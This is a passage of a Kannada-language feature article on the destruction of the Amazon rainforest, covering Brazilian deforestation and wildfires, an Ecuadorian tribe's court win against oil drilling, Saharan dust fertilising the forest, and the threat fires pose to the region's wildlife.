ಜನ ಆತನನ್ನು ಅಭಿವೃದ್ಧಿಯ ಹರಿಕಾರ ಎಂದೇ ನಂಬಿದರು. ಆತ ತೀವ್ರ ಬಲಪಂಥೀಯನಾದರೂ ಬ್ರೆಜಿಲ್ಲನ್ನು ಉದ್ಧಾರಮಾಡುವ ಮಂತ್ರಗಳು ಅವನಲ್ಲಿವೆ ಎಂಬ ಹುಸಿಸಂದೇಶ ಜನರಿಗೆ ಮುಟ್ಟಿತು. ಅವನು ಹೇಳಿದಂತೆಯೇ ನಡೆದ. ಬ್ರೆಜಿಲ್ ಜಗತ್ತಿನಲ್ಲೇ ದನದ ಮಾಂಸದ ರಫ್ತಿನಲ್ಲಿ ಮೊದಲನೆಯ ಸ್ಥಾನದಲ್ಲಿದೆ. ರಾಸುಗಳ ಅಭಿವರ್ಧನೆ ಎಂದರೆ ಹುಲ್ಲುಗಾವಲಿನ ವಿಸ್ತೀರ್ಣ ಹೆಚ್ಚಿಸಲೇಬೇಕು. ಈ ಪ್ರಕ್ರಿಯೆಯಲ್ಲೇ ಮಳೆಕಾಡಿಗೆ ಗರಗಸದ ಕೊಯ್ತ ಶುರುವಾಯಿತು. ಒಂದೇ ತಿಂಗಳಿನಲ್ಲಿ ಲಾಸ್ ಏಂಜಲೀಸ್ ನಗರದ ವಿಸ್ತೀರ್ಣದಷ್ಟು ಕಾಡು ಬೋಳಾಯಿತು. ನಾಟಾ ವ್ಯಾಪಾರಿಗಳಿಗಂತೂ ದುಡ್ಡೋ ದುಡ್ಡು. ಕಳ್ಳವ್ಯಾಪಾರಕ್ಕೆ ಇಳಿಯಬೇಕಾಗಿಯೇ ಇರಲಿಲ್ಲ. ಅಷ್ಟು ಹೊತ್ತಿಗೆ ಬ್ರೆಜಿಲ್‍ನ ಕಾಡುಗಳ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್‍ನ ಹೀರಿಕೆಯ ಪ್ರಮಾಣವೂ ಕಡಿಮೆಯಾಗಿತ್ತು ಅಂದರೆ ಜಾಗತಿಕ ತಾಪಮಾನ ಇಳಿಸುವ ಬದಲು ಹೆಚ್ಚಿಸುವ ಪ್ರಕ್ರಿಯೆ.

ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನ ಬುಡಕಟ್ಟು ಮತ್ತು ಕಾನೂನಿನ ಚೌಕಟ್ಟು

ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನಲ್ಲಿ ಸುಮಾರು 400 ಬಗೆಯ ಬುಡಕಟ್ಟುಗಳು ವಾಸಿಸುತ್ತಿವೆ. ಆಕಾಶದಲ್ಲಿ ಹೆಲಿಕಾಪ್ಟರ್ ಹೋದರೆ ಸಾಕು, ಪೊದೆಯಲ್ಲೇ ನಿಂತು ವಿಸ್ಮಯಪಡುವ ತಲೆಮಾರು ಈಗಲೂ ಬದಲಾಗಿಲ್ಲ. ಆದರೆ ಈಕ್ವೇಡಾರ್‍ನ ಪೂರ್ವಭಾಗದ ಕಾಡಲ್ಲಿರುವ ಸುಮಾರು 4000 ಮಂದಿ ವಯೋರಾನಿ ಬುಡಕಟ್ಟಿನ ಜನರು ಸ್ವಲ್ಪಮಟ್ಟಿಗೆ ಆಧುನಿಕ ಪ್ರಪಂಚಕ್ಕೆ ತೆರೆದುಕೊಂಡಿದ್ದಾರೆ. ಅವರ ವೇಷಭೂಷಣಗಳೇನೂ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿ ಬದಲಾಗಿಲ್ಲ. ತಮ್ಮ ಉಳಿವಿಗೆ ಸಂಬಂಧಿಸಿದಂತೆ ಏನಾದರೂ ಸಂಚಕಾರ ಬಂದರೆ ಈಗಲೂ ವಿಷದ ಬಾಣ ಬಿಡಲು ಹೆದರುವುದಿಲ್ಲ. `ಇದು ನಮ್ಮ ತಲೆಮಾರಿನವರು ನಾವು ಬದುಕಲು ಹೇಳಿಕೊಟ್ಟ ತಂತ್ರ’ ಎನ್ನುತ್ತಾರೆ. ಇವರಾಡುವ ಭಾಷೆಯ ಬಗ್ಗೆ ಭಾಷಾತಜ್ಞರಿಗೂ ಅದು ಯಾವ ಮೂಲದ್ದು ಎಂಬ ಸುಳಿವು ಸಿಕ್ಕಿಲ್ಲ.

ಬಾಲ್ಯದಲ್ಲೇ ಬಿಲ್ಲು ವಿದ್ಯೆ ಕೋರ್ಟ್‍ನಲ್ಲಿ ಗೆದ್ದ ಸಂಭ್ರಮ

ಈಕ್ವೆಡಾರ್‍ನಲ್ಲಿ ಈ ಬುಡಕಟ್ಟು ವಾಸಿಸುವ ಜಾಗಕ್ಕೆ ನಿಸರ್ಗ ನೆಲದಾಳದಲ್ಲಿ ತೈಲವನ್ನು ಭರ್ತಿಮಾಡಿದೆ. ಸರ್ಕಾರಕ್ಕೆ ಇದಕ್ಕಿಂತ ಸಂಪನ್ಮೂಲ ಬೇಕೆ? ತೈಲಾಧಿಪತಿಗಳಿಗೆ ಇದು ಕೆರಳಿಸಿದ ಆಸೆ ಒಂದಲ್ಲ. ತಕ್ಷಣವೇ ಹಣ ತರುವ ಬಾಬತ್ತು. ಈಕ್ವೆಡಾರ್ ಸರ್ಕಾರ ಸುಮಾರು ಎಂಟು ಲಕ್ಷ ಚದರ ಕಿಲೋ ಮೀಟರ್ ವಿಸ್ತೀರ್ಣವಿರುವ ಈ ದಟ್ಟಕಾಡನ್ನು ತೈಲದ ಕಂಪನಿಗಳಿಗೆ ಗಣಿಮಾಡಲು ಅನುಮತಿ ಕೊಟ್ಟಿತ್ತು. ಅಲ್ಪಸ್ವಲ್ಪ ಪ್ರಪಂಚ ಜ್ಞಾನವಿರುವ ಈ ಬುಡಕಟ್ಟಿನವರ ನೆರವಿಗೆ ಕ್ರಿಶ್ಚಿಯನ್ ಧರ್ಮ ಪ್ರಚಾರಕರು ಬಂದರು. 2012ರಲ್ಲಿ ಯಾವ ನೆರವೂ ಕೊಡದೆ ಈಕ್ವೆಡಾರ್ ಸರ್ಕಾರ ಬುಡಕಟ್ಟಿನವರನ್ನು ಒಲಿಸಲು ನೋಡಿತ್ತು. ಇದಕ್ಕೆ ಒಪ್ಪಿದರೆ ತಮ್ಮ ಬುಡವೇ ನಾಶವಾಗುತ್ತದೆಂದು ಬಗೆದ ಬುಡಕಟ್ಟಿನ ಜನರು ಈಕ್ವೆಡಾರ್‍ನ ಕೋರ್ಟ್ ಮೆಟ್ಟಿಲೇರಿದರು-‘ಸಹಸ್ರಾರು ವರ್ಷಗಳಿಂದ ನಮ್ಮ ಹಿರಿಯರು ಬದುಕಿದ್ದ ಈ ನೆಲೆಯನ್ನು ಬೇಕಾಬಿಟ್ಟಿ ಮಾರಿ ನಮ್ಮನ್ನು ಅತಂತ್ರಗೊಳಿಸಬೇಡಿ. ನಿಮಗೆ ಈ ನೆಲದ ಮೇಲೆ ಎಷ್ಟು ಹಕ್ಕಿದೆಯೋ, ಅಷ್ಟೇ ಹಕ್ಕು ನಮಗೂ ಇದೆ’ ಎಂದು ಬುಡಕಟ್ಟು ಕಾನೂನಿನ ನೆರವು ಪಡೆದು ಮೊಕದ್ದಮೆ ಹೂಡಿದರು. ಜೊತೆ ಜೊತೆಗೆ ಮಹಿಳೆಯರ ಸಮಾವೇಶಗಳನ್ನು ನಡೆಸಿದರು.

ಕೊನೆಗೆ ಇದೇ ಏಪ್ರಿಲ್‍ನಲ್ಲಿ ಕೋರ್ಟ್ ಇವರ ಪರವಾಗಿ ತೀರ್ಪುಕೊಟ್ಟಿತು. ಇದು ಈ ನೆಲವಾಸಿಗಳಿಗೆ ದೊರೆತ ಮೊದಲ ಜಯ. ಈಗ ಉಳಿದ ಬುಡಕಟ್ಟುಗಳೂ ಅದನ್ನೇ ಅನುಸರಿಸಿ ಹೋರಾಡುವ ಛಲ ಹೊಂದಿವೆ. `ಮೊದಲಿನಿಂದಲೂ ಹೊರಗಿನವರೊಂದಿಗೆ ಹೋರಾಡುತ್ತಲೇ ನಮ್ಮ ಅಸ್ತಿತ್ವವನ್ನು ಉಳಿಸಿಕೊಂಡಿದ್ದೇವೆ. ಈಗ ಕಾನೂನು ಹೋರಾಟದಲ್ಲೂ ಜಯಗಳಿಸಿದ್ದೇವೆ’ ಎಂದು ಹೆಮ್ಮೆಯಿಂದ ಹೇಳುತ್ತಿದ್ದಾರೆ. ಇರುವ ನೆಲದಲ್ಲೆಲ್ಲ ತೈಲ ಬಾವಿಗಳನ್ನು ಕೊರೆದರೆ ಕುಡಿಯುವ ನೀರು ನಿಮಗೂ ಸಿಕ್ಕುವುದಿಲ್ಲ ಎಂದು ಎಚ್ಚರಿಕೆಯನ್ನು ಕೊಟ್ಟಿದ್ದಾರೆ. ಬುಡಕಟ್ಟಿನ ಮಹಿಳೆಯರು ಈಗ ಬುದ್ಧಿವಂತರಾಗುತ್ತಿದ್ದಾರೆ.

ಇದರ ಜೊತೆ ಜೊತೆಗೆ ಮೂಲ ನಿವಾಸಿಗಳಿಗೆ ಎತ್ತಂಗಡಿಯಾಗುತ್ತ ಬಂತು. ಈ ಮೂಲ ನಿವಾಸಿಗಳು ಬ್ರೆಜಿಲ್‍ನಲ್ಲಿ ಕೈದಿಗಳಾಗಿ ಪ್ಲಾಂಟೇಷನ್‍ಗಳಲ್ಲಿ ದುಡಿಯಬೇಕಾಗಿತ್ತು. ಅವರಲ್ಲಿ ಬಲು ಪಾಲು ಗುಲಾಮಗಿರಿಯಿಂದ ತಪ್ಪಿಸಿಕೊಂಡು ಜಗತ್ತಿನ ಕಣ್ಣಿಗೆ ಬೀಳುವುದೇ ಬೇಡ ಎಂದು ಬ್ರೆಜಿಲ್‍ನ ಕಾಡು ಹೊಕ್ಕಿದ್ದರು. ಕೆಲವರಿಗೆ ಅಲ್ಲಿ ನೆಲೆಸಲು ಕಾನೂನಿನ ಪ್ರಕಾರ ಸಾಧ್ಯವಾಯಿತು. ಇನ್ನು ಬಹುತೇಕ ಮಂದಿಗೆ ಆ ಭಾಗ್ಯವಿರಲಿಲ್ಲ. ಅವರನ್ನು ಒಕ್ಕಲೆಬ್ಬಿಸಿದರೆ ಅದೇನೂ ದೊಡ್ಡ ಅಪರಾಧವಲ್ಲ ಎಂದು ಗುತ್ತಿಗೆದಾರರಿಗೂ ಗೊತ್ತು. ಅಂಥ ಜಾಗಗಳಲ್ಲಿದ್ದ ಅರಣ್ಯವನ್ನು ಬೋಳಿಸುತ್ತ ನಾಟಾ ದೊರೆಗಳು ದೊಡ್ಡಿನ ದಂದೆಯಲ್ಲಿ ತೊಡಗಿದರು.
ಬ್ರೆಜಿಲ್‍ನ ಸ್ಪೇಸ್ ಏಜೆನ್ಸಿ ಹೇಳುವಂತೆ ಈ ವರ್ಷ ಪ್ರತಿ ನಿಮಿಷಕ್ಕೆ ಒಂದು ಫುಟ್‍ಬಾಲ್ ಸ್ಟೇಡಿಯಂನಷ್ಟು ಕಾಡು ಬ್ರೆಜಿಲ್‍ನಲ್ಲಿ ನಾಶವಾಗಿದೆ. ಈ ಜುಲೈ ತಿಂಗಳಲ್ಲೇ ಪ್ರತಿ ದಿನ ಬ್ರೆಜಿಲ್ 73 ಚದರ ಕಿಲೋ ಮೀಟರ್ ಕಾಡು ಕಳೆದುಕೊಂಡಿದೆ. ಆಗಸ್ಟ್ ತಿಂಗಳಿನಲ್ಲಿ ಈ ದಾಖಲೆಯನ್ನೂ ಮುರಿದು 1,700 ಚದರ ಕಿಲೋ ಮೀಟರ್‍ನಷ್ಟು ಕಾಡು ಬೋಳಾಗಿದೆ. ಬಹುಶಃ ಈ ಪ್ರಮಾಣದ ಕಾಡು ನಾಶ ಜಗತ್ತಿನಲ್ಲೇ ಎಲ್ಲೂ ಕಂಡುಬಂದಿಲ್ಲ.

ಕೊಚ್ಚು – ಬೆಂಕಿ ಇಡು – ಕೃಷಿ ಭೂಮಿಯ ವಿಸ್ತರಣೆ ನಾಟಾ ದೊರೆಗಳಿಗೆ ಸರ್ಕಾರವೇ ಕುಮ್ಮಕ್ಕು

ಜಗತ್ತಿನಲ್ಲಿ ಸೋಯಾ ಎಣ್ಣೆಗೆ ದೊಡ್ಡ ಬೇಡಿಕೆ ಇದೆ. ಎಲ್ಲೆಡೆ ಬರೀ ಕಾಡೇ ಇದ್ದರೆ ಸೋಯಾ ಬೀನ್ ಬೆಳೆಯುವುದು ಹೇಗೆ? ಇದು ಅಧ್ಯಕ್ಷರು ಜನರನ್ನೇ ಕೇಳಿದೆ ಪ್ರಶ್ನೆ. ಇದಕ್ಕಾಗಿ ಕಾಡು ಒತ್ತುವರಿ ಮಾಡಲೇಬೇಕು, ಪೊದೆ, ಮರಗಳಿಗೆ ಬೆಂಕಿಹಾಕುತ್ತ ಕೃಷಿ ಕ್ಷೇತ್ರವನ್ನು ವಿಸ್ತರಿಸುತ್ತ ಹೋಗುವುದು ಕಂಡ ಮೊದಲ ಪರಿಹಾರ. ಕ್ಯಾಲಿಫೋರ್ನಿಯ ಅಥವಾ ಆಸ್ಟ್ರೇಲಿಯದಲ್ಲಿ ಕಾಡುಗಳು ಬೆಂಕಿಗೆ ಜಗ್ಗುವುದಿಲ್ಲ. ನಿಸರ್ಗವೇ ಆ ಗುಣವನ್ನು ಅವಕ್ಕೆ ನೀಡಿದೆ. ಆದರೆ ಅಮೆಜಾನ್ ಮಳೆಕಾಡು ಹಾಗಲ್ಲ. ವೃಕ್ಷದ ಎಲೆಗಳ ಮೇಲೆ ನೀರಿನ ಪಸೆ ಇದ್ದರೂ ಬೆಂಕಿ ಬಿದ್ದಾಗ ಅವೂ ಬಾಷ್ಪವಾಗಿ ಹೋಗಿಬಿಡುತ್ತವೆ. ಇದು ಬ್ರೆಜಿಲ್‍ಗೆ ಮಾತ್ರ ಸೀಮಿತವಾದ ಸಂಕಟವಲ್ಲ. ಬ್ರೆಜಿಲ್‍ಗೆ ಹೊಂದಿಕೊಂಡಿರುವ ಬೊಲಿವಿಯ, ಪೆರು, ಈಕ್ವೆಡಾರ್‍ಗಳಲ್ಲೂ ಗಣಿಗಾರಿಕೆ ಕಾಡಿನ ಹೃದಯದಲ್ಲೇ ನಡೆಯುತ್ತಿದೆ. ಇದರ ಜೊತೆಗೆ ಭರ್ಜರಿ ಜಲವಿದ್ಯುತ್ ಯೋಜನೆಗಳೂ ತಲೆ ಎತ್ತುತ್ತಿವೆ, ಅಭಿವೃದ್ಧಿಯ ಹೆಸರಲ್ಲಿ ಅಣೆಕಟ್ಟೆ ಮತ್ತು ರಸ್ತೆಗಳು ಕಾಡಿನ ಒಳಕ್ಕೇ ನುಗ್ಗಿವೆ. ಈಗಿನ ಅಂದಾಜಿನಂತೆ ಅಮೆಜಾನ್ ಕಾಡಿನ ಮೂಲ ವಿಸ್ತೀರ್ಣದಲ್ಲಿ ಶೇ. 20 ಭಾಗ ನಾಶವಾಗಿಬಿಟ್ಟಿದೆ.

ಅಮೆಜಾನ್ ಕಾಡಿಗೆ ಗೊಬ್ಬರ ಎರೆದವರು 

ಯಾರೂ ಬೆಟ್ಟಕ್ಕೆ ಕಲ್ಲು ಹೊರುವುದಿಲ್ಲ, ಬದಲು ಬೆಟ್ಟಗಳನ್ನು ಕರಗಿಸಿ ತಮಗೆ ಬೇಕಾದ ಕಲ್ಲು ಪಡೆಯುತ್ತಾರೆ. ಕಾಡಿಗೆ ಗೊಬ್ಬರ ಹಾಕುವುದುಂಟೆ? ತನಗೆ ಬೇಕಾದ ಗೊಬ್ಬರವನ್ನು ವೃಕ್ಷಗಳೇ ತಯಾರಿಸಿಕೊಳ್ಳುತ್ತವೆ. ಬಿದ್ದ ಎಲೆಗಳು, ಟೊಂಗೆಗಳು ಕೊಳೆತು ಗೊಬ್ಬರವಾಗುತ್ತದೆ. ಆದರೆ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿಗೆ ಲಕ್ಷಾಂತರ ವರ್ಷಗಳಿಂದ ಗೊಬ್ಬರ ಹಾಕುತ್ತಿರುವುದು ನಿಜ. ಇದು ಖಾಸಗಿಯವರಾಗಲಿ, ಸರ್ಕಾರವಾಗಲಿ ಮಾಡುತ್ತಿಲ್ಲ. ಇನ್ನು ಬುಡಕಟ್ಟಿನವರೂ ಇಂಥ ತಪ್ಪು ಮಾಡುವುದಿಲ್ಲ. ಆದರೆ ಪ್ರಕೃತಿಯೇ ಈ ಕೆಲಸವನ್ನು ಮಾಡುತ್ತಿದೆ.

ಎತ್ತಣ ಸಹರಾ ಮರುಭೂಮಿ-ಎತ್ತಣ ಅಮೆಜಾನ್ ಮಳೆಕಾಡು? ನಿಜ. ಹೊರನೋಟಕ್ಕೆ ಇದು ವೈರುಧ್ಯವೆಂದು ಕಾಣಬಹುದು. ಆದರೆ ನಿಸರ್ಗಕ್ಕೆ ಬೇರೆಯದೇ ಆದ ಲೆಕ್ಕಾಚಾರವಿದೆ. ಸಹರಾ ಮರುಭೂಮಿಯ ಚಾಡ್ ಸರೋವರದ ಈಶಾನ್ಯ ಭಾಗದಲ್ಲಿ ಬೊದಿಲೇ ಎಂಬ ತಗ್ಗಿದೆ. ಅದರ ವಿಸ್ತೀರ್ಣ 1,250 ಚದರ ಕಿಲೋ ಮೀಟರ್. ಅದರಲ್ಲಿರುವುದೆಲ್ಲ ಬರೀ ದೂಳು. ಅಲ್ಲಿರುವ ದೂಳನ್ನು ಏಕ್‍ದಂ ಐದು ಕಿಲೋ ಮೀಟರ್ ಎತ್ತರಕ್ಕೆ ಎಗರಿಸಿ ಗಾಳಿ ಆಕಾಶಮಾರ್ಗವಾಗಿ ಒಯ್ದು ಬಿಡುತ್ತದೆ. ಒಮ್ಮೆ ಬಿರುಗಾಳಿ ಬೀಸಿತೆಂದರೆ ಸುಮಾರು 1,820 ಲಕ್ಷ ಟನ್ನು ದೂಳು ಸಂಚಾರಿಯಾಗುತ್ತದೆ. ಸಾಧಾರಣ ಲೆಕ್ಕಹಾಕಿದರೆ ಇಷ್ಟು ತುಂಬಲು 6,89,290 ಟ್ರಕ್ಕುಗಳು ಬೇಕು. ದೂಳಿನ ಪಯಣ 4,800 ಕಿಲೋ ಮೀಟರ್ ಆಚೆಯ ಅಮೆಜಾನ್ ಕಡೆಗೆ. ಮಾರ್ಗದಲ್ಲಿ ಒಂದಷ್ಟು ದೂಳು ನಷ್ಟವಾಗುತ್ತದೆ. ಅಮೆಜಾನ್ ಕಾಡಿಗೇ ಬಂದು ಇಳಿದಾಗ 280 ಲಕ್ಷ ಟನ್ನು ಸಂಚಯನವಾಗಿರುತ್ತದೆ.

ವಿಶೇಷವಿರುವುದು ಇಲ್ಲೇ. ಇದು ಬರಿಯ ದೂಳಲ್ಲ. ಇದರಲ್ಲಿ 22,000 ಟನ್ನು ರಂಜಕವಿದೆ. ವೃಕ್ಷಗಳಿಗೆ ಇದಕ್ಕಿಂತ ಪೋಷಕಾಂಶ ಬೇಕೆ? ಪ್ರತಿವರ್ಷ ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನಿಂದ ಇಷ್ಟೇ ಪ್ರಮಾಣದ ಪೋಷಕಾಂಶ ಕಾಡುಬಿಟ್ಟು ಹೊರಗೆ ಹರಿದುಹೋಗುತ್ತದೆ. ಆದರೆ ನಿಸರ್ಗ ಈ ನಷ್ಟಭರ್ತಿ ಮಾಡುತ್ತದೆ. ಗಾಳಿ ಪುಕ್ಕಟೆ ಗುತ್ತಿಗೆದಾರನಾಗಿ ಸಾಗಣೆ ಮಾಡುತ್ತದೆ. ಅಮೆಜಾನ್ ಕಾಡುಗಳ ಸಮೃದ್ಧ ಅಭಿವರ್ಧನೆಗೆ ಸದ್ದಿಲ್ಲದೆ ಕೆಲಸಮಾಡುತ್ತಿದೆ ಗಾಳಿ.

ಒಂದೆಡೆ ವಿಶ್ವಸಂಸ್ಥೆಯ ಆಶ್ರಯದಲ್ಲಿ, ಅಭಿವೃದ್ಧಿಹೊಂದಿದ ಮತ್ತು ಅಭಿವೃದ್ಧಿಶೀಲ ರಾಷ್ಟ್ರಗಳು ಸೇರಿ ಕೈಗಾರಿಕಾಯುಗಕ್ಕೆ ಹಿಂದಿದ್ದ ಮಟ್ಟಕ್ಕೆ ವಾಯುಗೋಳದಲ್ಲಿ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ಪ್ರಮಾಣವನ್ನು ತಗ್ಗಿಸಲು ಹೋರಾಡುತ್ತಿವೆ. ಇಲ್ಲೋ ಕಾಡು ನಾಶದಿಂದ ಪ್ರತಿವರ್ಷ 0.5 ಶತಕೋಟಿ ಮೆಟ್ರಿಕ್ ಟನ್ ಕಾರ್ಬನ್ ಡೈ ಆಕ್ಸೈಡ್ ವಾಯುಗೋಳಕ್ಕೆ ಬಿಡುಗಡೆಯಾಗುತ್ತಿದೆ. ಹೀಗಾದರೆ ಭೂತಾಪವನ್ನು ಇಳಿಸುವ ಬಗೆಯಾದರೂ ಏನು? ವಿಶ್ವಸಂಸ್ಥೆ ಕೇಳುತ್ತಿರುವ ಪ್ರಶ್ನೆ ಇದು.

ಬ್ರೆಜಿಲ್‍ನ ಬುಡಕಟ್ಟು ನೆಲೆಯಲ್ಲೇ ತಲೆ ಎತ್ತಿರುವ ಅಪಿಯಾಕಾಸ್ ಜಲವಿದ್ಯುತ್ ಯೋಜನೆ

ಮಳೆಕಾಡಿನ ಜೀವಿ ವೈವಿಧ್ಯಕ್ಕೆ ಕುತ್ತು

ದಕ್ಷಿಣ ಅಮೆರಿಕವಲ್ಲದೆ ಇತರ ದೇಶಗಳ ಕೆಂಗಣ್ಣಿಗೂ ಗುರಿಯಾಗಿರುವ ಅಧ್ಯಕ್ಷ ಬೊಲ್ಸನಾರೊಗೆ ಬೆಂಕಿ ವ್ಯಾಪಕವಾಗಿ ಪೆರು, ಬೊಲಿವಿಯ, ಪರುಗ್ವೆಗೂ ಹಬ್ಬಿದಾಗ ಹೇಳಿಕೆಯನ್ನು ಕೊಡಲೇಬೇಕಾದ ಜರೂರು ಉಂಟಾಯಿತು. `ಇದೆಲ್ಲ ಸರ್ಕಾರೇತರ ಸಂಸ್ಥೆಗಳ ಕುತಂತ್ರ. ಆ ಸಂಸ್ಥೆಗಳಿಗೆ ಸರ್ಕಾರ ಹಣಬೆಂಬಲ ನೀಡದಿದ್ದುದರಿಂದ ಈ ಕೃತ್ಯಕ್ಕೆ ಕೈಹಾಕಿವೆ’ ಎಂದು ಆರೋಪಮಾಡಿದ. ಆದರೆ ಬ್ರೆಜಿಲ್‍ನ ಪರಿಸರ ಜಾರಿ ಇಲಾಖೆಗೆ ಈ ವರ್ಷದಲ್ಲೇ 23 ದಶಲಕ್ಷ ಡಾಲರ್ ನೆರವಿಗೆ ಕತ್ತರಿಬಿದ್ದಿದೆ.

ಈಗ ಫ್ರೆಂಚ್ ಅಧ್ಯಕ್ಷ ಮ್ಯಾಕ್ರಾನ್ ಕೂಡ ಗುಡುಗಿದ್ದಾರೆ. ಏಕೆಂದರೆ ಫ್ರೆಂಚ್ ಗಯಾನಕ್ಕೂ ಈ ಬೆಂಕಿ ತಟ್ಟಿದೆ. `ಬ್ರೆಜಿಲ್ ಅಧಯಕ್ಷ ಮಹಾ ಸುಳ್ಳುಗಾರ’ ಎಂದು ದೂಷಿಸಿದಾಗ ಹಲವು ದೇಶಗಳಿಗೆ ಇದು ಸರಿಯಾಗಿಯೇ ಕಂಡಿದೆ. ಒಂದೆಡೆ ದಾವಾಗ್ನಿ ಮಾಡಿದ ಅನಾಹುತದ ಲೆಕ್ಕವನ್ನು ಗ್ರೀನ್ ಪೀಸ್‍ನಂತಹ ಸಂಸ್ಥೆಗಳು ಜಗತ್ತಿನ ಮುಂದಿಡುತ್ತಿರುವಾಗ ನ್ಯಾಷನಲ್ ಜಿಯೋಗ್ರಾಫಿಕ್ ಕೆಲವು ಮೂಲಭೂತ ಪ್ರಶ್ನೆಗಳನ್ನು ಎತ್ತಿದೆ. ಅದು ಮಳೆಕಾಡಿನ ದೊಡ್ಡ ಪ್ರಮಾಣದ ಜೀವಿಸಂಕುಲಕ್ಕೆ ಬೆಂಕಿ ತಂದೊಡ್ಡಿರುವ ಸಂಕಟ.

ದಾವಾಗ್ನಿಯ ರೌದ್ರಾವತಾರ

ಅಮೆಜಾನ್ ಮಳೆಕಾಡಿನ ಜೀವಿವೈವಿಧ್ಯ ಜಗತ್ತಿಗೇ ತಿಳಿದಿದೆ. ಇಡೀ ಭೂಗೋಳದ ಜೀವಿರಾಶಿಯ ಶೇ. 10 ಭಾಗ ಇರುವುದು ಇಲ್ಲಿ. ಉಪನದಿಗಳೂ ಸೇರಿದಂತೆ ಅಮೆಜಾನ್ ನದಿಯಲ್ಲಿ 2,200 ಪ್ರಭೇದದ ಮೀನುಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಿದ್ದಾರೆ. ಮಳೆಕಾಡಿನಲ್ಲಿ 378 ಪ್ರಭೇದದ ಸರೀಸೃಪಗಳು ಇವೆಯೆಂದು ಅಂದಾಜು ಮಾಡಿದ್ದಾರೆ. ಇನ್ನು ಕೀಟಗಳ ಪ್ರಪಂಚ ದೊಡ್ಡದು – 25 ಲಕ್ಷ ಪ್ರಭೇದ, 1 ಲಕ್ಷಕ್ಕೂ ಹೆಚ್ಚಿನ ಅಕಶೇರುಕಗಳು – ಈ ಪಟ್ಟಿಯನ್ನು ಬೆಳೆಸುತ್ತಲೇ ಹೋಗಬಹುದು. ಅದರಲ್ಲೂ ಜಾಗ್ವಾರ್ (ಅಮೆಜಾನ್ ಚಿರತೆ), ಹದ್ದು, ಪಾಟಲ ಬಣ್ಣದ ಡಾಲ್ಫಿನ್, ಮಕಾವ, ಹಸಿರು ಇಗುವಾನ, ಎಲ್ಲಕ್ಕೂ ಇದು ನೆಲೆ ಒದಗಿಸಿದೆ. ಅಷ್ಟೇ ಏಕೆ, ಅಮೆಜಾನ್ ನದಿಯೊಂದೇ ಜಗತ್ತಿನ ಶೇ. 15 ಭಾಗದ ಸಿಹಿನೀರನ್ನು ಸಾಗರಕ್ಕೆ ಹರಿಸುತ್ತಿದೆ.

ನ್ಯಾಷನಲ್ ಜಿಯಾಗ್ರಫಿಕ್‍ನ ಪರಿಣತರು ಅನೇಕ ಅಂಶಗಳ ಕಡೆ ಗಮನ ಸೆಳೆದಿದ್ದಾರೆ. ಈ ಮಳೆಕಾಡಿಗೆ ಬೆಂಕಿ ಬಿದ್ದಾಗಲೆಲ್ಲ ಕಾಡಿನ ಮಧ್ಯೆ ಜೀವಿಸುವ ಪ್ರಾಣಿಗಳಿಗೆ ಅಪಾಯ ಎದುರಾಗುತ್ತದೆ. ಅವಕ್ಕೆ ಅಂಥ ಸಂದರ್ಭದಲ್ಲಿ ಹೆಚ್ಚು ಆಯ್ಕೆಗಳು ಇರುವುದಿಲ್ಲ. ಚಿಕ್ಕ ಪ್ರಾಣಿಗಳಾದರೆ ನೆಲದ ಬಿಲದಲ್ಲಿ ತೂರಿ ಬಚಾವಾಗಬಹುದು. ನೀರಿನಲ್ಲಿ ಬದುಕುವ ಕಲೆ ಇದ್ದರೆ ನದಿಗಳತ್ತ ಓಡಬಹುದು. ಇದಾವುದೂ ಆಗದಿದ್ದರೆ ಬೆಂಕಿಯಲ್ಲಿ ಬೆಂದುಹೋಗುವುದು ಖರೆ. ಜಾಗ್ವಾರ್ ಎಂದು ಕರೆಯುವ ಚಿರತೆಗಳ ಆವಾಸಕ್ಕೆ ಬೆಂಕಿ ಬಿದ್ದಾಗ, ಅವು ವೇಗವಾಗಿ ಓಡಿ ಪಾರಾಗಬಹುದು. ಹಕ್ಕಿಗಳು ವೃಕ್ಷದ ಅವಲಂಬಿಯಾಗಿರುವುದರಿಂದ ಅವೂ ಕೂಡ ಹಾರಿ ಜೀವ ಉಳಿಸಿಕೊಳ್ಳಬಲ್ಲವು. ಆದರೆ ಎಲ್ಲವಕ್ಕೂ ಈ ಅವಕಾಶವಿಲ್ಲ. ಇರುವೆಭಕ್ಷಕ, ಕಪ್ಪೆ, ಸರೀಸೃಪ ವರ್ಗದ ಹಲ್ಲಿಗಳು, ಅನಕೊಂಡದಂತಹ ಹಾವುಗಳು ಪಾರಾಗುವುದು ಕಷ್ಟ. ಕೆಲವು ಪ್ರಾಣಿಗಳು ಮರ ಹತ್ತಿ ಪ್ರಾಣಾಪಾಯ ತಪ್ಪಿಸಿಕೊಳ್ಳಲು ಯತ್ನಿಸಿದರೆ ಅವೇ ಅವುಗಳಿಗೆ ಕುತ್ತಾಗುತ್ತದೆ.

ಮರದಿಂದ ಮರಕ್ಕೆ ಬೆಂಕಿ ಹರಡುವುದು ಸುಲಭ. ತೀರ ಇತ್ತೀಚೆಗಷ್ಟೇ ಅಂದರೆ 2011ರಲ್ಲಿ ಈಗ ಬೆಂಕಿ ಹೊತ್ತು ಉರಿದ ಜಾಗದಲ್ಲಿ ಜಗತ್ತಿಗೇ ಪರಿಚಯವಿಲ್ಲದ ಮಂಗಗಳ ಎರಡು ಪ್ರಭೇದಗಳನ್ನು ಪತ್ತೆಹಚ್ಚಿದಾಗ ವನ್ಯಜೀವಿ ಅಧ್ಯಯನ ತಂಡ ಎದೆ ಉಬ್ಬಿಸಿತ್ತು. ಈಗ ಅವು ಅಳಿದಿವೆಯೋ, ಉಳಿದಿವೆಯೋ ಎಂದು ತಿಳಿಯದು.

ಚಿತ್ರ 14: ಕೆಂಬಣ್ಣ ಹೊಟ್ಟೆಯ ಗಿಳಿ ಚಿತ್ರ 15 : ನೀರು ನಾಯಿ ಚಿತ್ರ 16: ಅಮೆಜಾನ್ ನದಿಯ ಪಾಟಲ ಡಾಲ್ಫಿನ್
